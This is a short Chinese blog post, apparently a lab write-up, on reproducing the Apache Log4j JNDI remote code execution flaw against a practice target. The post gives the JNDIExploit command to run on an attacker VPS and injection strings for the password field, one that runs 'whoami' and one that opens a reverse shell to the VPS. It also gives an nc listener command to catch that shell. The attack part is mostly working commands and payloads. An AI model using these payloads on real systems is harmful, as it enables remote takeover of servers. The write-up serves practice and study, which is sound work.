掌控者-封神台-Apache Log4j任意代码执行复现

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结一、工具JNDIExploit-1.2-SNAPSHOT.jar二、靶场看网页源码猜测就是username和password为注入点三、步骤vps有java环境java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP成功运行向密

旧目难忘

6093人浏览 · 2022-04-06 23:37:41

旧目难忘 · 2022-04-06 23:37:41 发布

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

Apache Log4j任意代码执行复现

一、工具
二、靶场
三、步骤
总结

一、工具

JNDIExploit-1.2-SNAPSHOT.jar

二、靶场

在这里插入图片描述
看网页源码

猜测就是username和password为注入点

三、步骤

vps有java环境
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP
成功运行
在这里插入图片描述

向密码框填入${jndi:ldap://vps的IP:1389/Basic/Command/whoami} 登录

有回显

在这里插入图片描述

先在vps运行 nc -lvp 6666监听6666

向密码框填入${jndi:ldap://vps的IP:1389/Basic/ReverseShell/vps的IP/6666} 登录

成功回传shell

在这里插入图片描述

总结

😀

华为开发者空间

华为开发者空间，是为全球开发者打造的专属开发空间，汇聚了华为优质开发资源及工具，致力于让每一位开发者拥有一台云主机，基于华为根生态开发、创新。

更多推荐

cover

2025 CCF中国软件大会（CCF ChinaSoft）智能化研发智能体技术论坛成功召开

华为开发者空间

cover

基于华为开发者空间，Astro+MaaS实现高考志愿择校推荐系统

华为开发者空间

cover

【案例共创】基于华为云MaaS和开源Agent框架Dify.AI构建聊天助手

华为开发者空间

所有评论(0)

查看更多评论

旧目难忘

@weixin_43821278

已为社区贡献1条内容